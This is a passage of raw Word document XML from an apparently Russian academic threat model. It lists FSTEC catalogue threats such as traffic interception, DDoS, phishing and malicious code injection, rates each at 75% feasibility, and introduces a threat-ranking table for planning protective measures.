              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EFB2703"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Наименование угрозы</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44146BDE"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Y</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD5A13">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:vertAlign w:val="subscript"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E7AEBF4"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Y, %</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00357C00" w:rsidRPr="00DA2A81" w14:paraId="356C7BA8" w14:textId="77777777" w:rsidTr="00357C00">
        <w:trPr>
          <w:trHeight w:val="904"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AE38799"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УБИ.116</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6524" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55D5B067"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Угроза перехвата данных, передаваемых по вычислительной сети</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01DD45A0"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20C4B550"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75%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00357C00" w:rsidRPr="00DA2A81" w14:paraId="2EEFCFDA" w14:textId="77777777" w:rsidTr="00357C00">
        <w:trPr>
          <w:trHeight w:val="873"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A56E3C2"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УБИ.140</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6524" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="226C8B1B"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Угроза приведения системы в состояние «отказ в обслуживании» (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DA2A81">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>DDoS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DA2A81">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3921476D"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CBDF86A"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75%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00357C00" w:rsidRPr="00DA2A81" w14:paraId="03270BD3" w14:textId="77777777" w:rsidTr="00357C00">
        <w:trPr>
          <w:trHeight w:val="958"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12CE2A51"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УБИ.153</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6524" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A3A1D2D"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 xml:space="preserve">Угроза усиления воздействия на вычислительные ресурсы при помощи сторонних серверов </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="727E0037"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66DB3903"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75%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00357C00" w:rsidRPr="00DA2A81" w14:paraId="7D718E45" w14:textId="77777777" w:rsidTr="00357C00">
        <w:trPr>
          <w:trHeight w:val="998"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EC26050"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УБИ.167</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6524" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51F5A702"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Угроза заражения компьютера при посещении неблагонадёжных сайтов</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5814CD08"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="310A9136"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75%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00357C00" w:rsidRPr="00DA2A81" w14:paraId="7F331F0B" w14:textId="77777777" w:rsidTr="00357C00">
        <w:trPr>
          <w:trHeight w:val="520"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CE7FF81"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УБИ.175</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6524" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B41CFD4"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 xml:space="preserve">Угроза «фишинга» </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06CEDB4D"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48BFBFEF"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75%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00357C00" w:rsidRPr="00DA2A81" w14:paraId="3C4E304A" w14:textId="77777777" w:rsidTr="00357C00">
        <w:trPr>
          <w:trHeight w:val="503"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59A6C022"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УБИ.186</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6524" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D25BEB4"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 xml:space="preserve">Угроза внедрения вредоносного кода </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C11DDE0"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3479B62A"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75%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00357C00" w:rsidRPr="00DA2A81" w14:paraId="40A07EEB" w14:textId="77777777" w:rsidTr="00357C00">
        <w:trPr>
          <w:trHeight w:val="724"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="646DDDF2"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УБИ.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>59</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6524" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65E87031"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392835">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Угроза «форсированного веб-браузинга»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2124FB7E"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22D0D5A2"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75%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00357C00" w:rsidRPr="00DA2A81" w14:paraId="07D4BCD2" w14:textId="77777777" w:rsidTr="00357C00">
        <w:trPr>
          <w:trHeight w:val="600"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B7BBFE4"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УБИ.131</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6524" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="357D748E"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Угроза подмены субъекта сетевого доступа</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28ED468D"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31B85655"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DA2A81">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>75%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00357C00" w:rsidRPr="00DA2A81" w14:paraId="16BA6C49" w14:textId="77777777" w:rsidTr="00357C00">
        <w:trPr>
          <w:trHeight w:val="566"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0085763A"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УБИ.221</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6524" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1B153284" w14:textId="77777777" w:rsidR="00357C00" w:rsidRPr="00561C88" w:rsidRDefault="00357C00" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00561C88">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Угроза модификации модели машинного обучения</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="173FA236"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F3EAFB1"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="22E71918" w14:textId="77777777" w:rsidR="00357C00" w:rsidRPr="00DA2A81" w:rsidRDefault="00357C00"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75%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="08D8F9B3" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F651085" w14:textId="77777777" w:rsidR="00357C00" w:rsidRDefault="00357C00" w:rsidP="00357C00">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00357C00">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Как видно из таблицы 6, все девять выявленных актуальных угроз имеют коэффициент реализуемости 75%, что соответствует высокой степени реализуемости согласно методике ФСТЭК. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EFFEF4" w14:textId="2AE6B2C6" w:rsidR="008E0171" w:rsidRPr="00357C00" w:rsidRDefault="008E0171" w:rsidP="00357C00">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF2AF5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Финальным этапом является составление таблицы ранжирования угроз на основании данного расчета. Ранжирование позволяет перейти от теоретических оценок к практическому планированию, выделив наиболее критические угрозы, которые требуют первоочередного внимания и ресурсов для их нейтрализации. В результате мы получаем наглядный и упорядоченный список приоритетов для разработки комплекса защитных мер. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF2AF5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Этот процесс показан в таблице </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF2AF5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D0CA38" w14:textId="77777777" w:rsidR="00357C00" w:rsidRDefault="00357C00" w:rsidP="008E0171">
      <w:pPr>
